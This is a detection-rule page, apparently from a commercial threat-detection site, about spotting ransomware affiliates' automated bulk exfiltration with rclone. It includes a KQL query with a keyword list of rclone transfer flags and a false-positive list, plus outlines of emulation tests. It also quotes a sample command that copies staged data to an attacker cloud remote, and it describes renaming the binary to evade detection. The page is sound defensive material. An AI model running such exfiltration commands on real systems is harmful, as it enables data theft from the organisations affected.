Response playbooks, investigation guides, and Atomic Red Team tests are Pro-only. Upgrade to unlock the full detection package for THREAT-Rclone-AutomatedCloudSync.

Upgrade to Pro
THREAT-Rclone-AutomatedCloudSync

Automated Exfiltration — Automated Bulk Data Exfiltration via rclone Cloud-Sync Tooling

Exfiltration Last updated:

rclone is a legitimate, widely-used open-source command-line tool for syncing files to more than 40 cloud storage backends (Mega, pCloud, Backblaze B2, Dropbox, S3-compatible endpoints, WebDAV, SFTP). Its portability, single-binary distribution, and broad backend support have made it the exfiltration tool of choice for ransomware affiliates during the double-extortion phase of an intrusion: rather than manually uploading files one at a time, the operator drops rclone (often renamed to blend in — svchost.exe, winupdate.exe, or similar), stages an attacker-authored rclone.conf pointing at a throwaway cloud account, and issues a single scripted command such as `rclone copy C:\staged\ remote:bucket --transfers=32 --multi-thread-streams=4` against previously staged data. From that point the entire transfer proceeds automatically with no further operator interaction — the defining trait of MITRE ATT&CK T1020 (Automated Exfiltration), which describes exfiltration performed automatically after data has been collected/staged, as distinct from T1029 (Scheduled Transfer, a recurring cron/task-scheduler-driven pattern already covered elsewhere in this corpus) and distinct from cloud control-plane grant abuse (T1537, where data is transferred by re-permissioning a victim-owned cloud resource rather than pushing bytes through a client tool). Conti, LockBit affiliates, BlackCat/ALPHV affiliates, and Cl0p have all been widely documented using rclone in this exact pattern immediately prior to ransomware deployment, making its appearance on an endpoint — especially a server or file share host with no legitimate business reason to run cloud-sync software — a high-confidence precursor to both data leak and imminent encryption.

What is THREAT-Rclone-AutomatedCloudSync Automated Bulk Data Exfiltration via rclone Cloud-Sync Tooling?

Automated Bulk Data Exfiltration via rclone Cloud-Sync Tooling (THREAT-Rclone-AutomatedCloudSync) is a sub-technique of Automated Exfiltration (T1020) in the MITRE ATT&CK framework. It maps to the Exfiltration tactic — the adversary is trying to steal data.

This page provides production-ready detection logic for Automated Bulk Data Exfiltration via rclone Cloud-Sync Tooling, covering the data sources and telemetry it touches: Process: Process Creation, Microsoft Defender for Endpoint (DeviceProcessEvents). The queries below are rated high severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.

MITRE ATT&CK

Tactic
Exfiltration
Microsoft Sentinel / Defender
kusto
let LookbackWindow = 24h;
let RcloneCommandIndicators = dynamic([
  "rclone.conf", "--multi-thread-streams", "--transfers", "--bwlimit", "copy remote:", "sync remote:", "config create"
]);
DeviceProcessEvents
| where Timestamp > ago(LookbackWindow)
| where ProcessVersionInfoOriginalFileName =~ "rclone.exe"
    or InitiatingProcessCommandLine has_any (RcloneCommandIndicators)
    or ProcessCommandLine has_any (RcloneCommandIndicators)
| extend RenamedBinary = FileName !~ "rclone.exe" and ProcessVersionInfoOriginalFileName =~ "rclone.exe"
| project Timestamp, DeviceName, AccountName, FileName, FolderPath, ProcessVersionInfoOriginalFileName,
    ProcessCommandLine, InitiatingProcessFileName, RenamedBinary
| sort by Timestamp desc

Flags process execution where the PE's original filename metadata (ProcessVersionInfoOriginalFileName) identifies it as rclone.exe regardless of the on-disk filename — catching the common ransomware-affiliate pattern of renaming the binary to blend in — or where the command line contains rclone-specific configuration and transfer flags. Server and file-share hosts are the highest-value targets for this detection since they rarely have a legitimate reason to run cloud-sync software.

high severity medium confidence

Data Sources

Process: Process Creation Microsoft Defender for Endpoint (DeviceProcessEvents)

Required Tables

DeviceProcessEvents

False Positives

  • IT/backup teams intentionally using rclone for legitimate cloud-storage synchronization or migration — should be documented and excluded by host name and destination remote name
  • DevOps automation that uses rclone to publish build artifacts to an approved cloud storage bucket
  • Power users syncing personal cloud storage on a workstation where local software policy permits it
  • Security or backup vendor tooling that bundles rclone as a dependency for their own approved backup product

Sigma rule & cross-platform mapping

The detection logic for Automated Bulk Data Exfiltration via rclone Cloud-Sync Tooling (THREAT-Rclone-AutomatedCloudSync) above is provided in a vendor-neutral form so you can deploy it on any SIEM. The same logic is shipped here as native KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the following logsource:

logsource:
  category: process_creation
  product: windows

Browse the community-maintained Sigma rules for this technique:


Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Simulated Renamed rclone Binary Execution with Transfer Flags

    Expected signal: Sysmon Event ID 1 / DeviceProcessEvents: winupdate.exe executing with ProcessVersionInfoOriginalFileName='rclone.exe' and a command line containing 'copy', 'remote:', '--multi-thread-streams', and '--transfers'.

  2. Test 2Simulated rclone.conf Creation

    Expected signal: Sysmon Event ID 11 (FileCreate) / DeviceFileEvents: rclone.conf created under %APPDATA%\rclone\ by powershell.exe.

  3. Test 3Bulk File Staging Followed by Sustained Cloud-Provider Connection

    Expected signal: File creation events for the staged archive under /tmp, followed within seconds by five outbound network connection events (Sysmon-for-Linux Event ID 3 / auditd) from curl to the test endpoint.

Unlock playbooks & atomic tests with Pro

Get the full detection package for THREAT-Rclone-AutomatedCloudSync — response playbook and atomic red team tests, plus investigation guidance and hunting queries.

df00tech Pro — £29/user/month

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance

Related Detections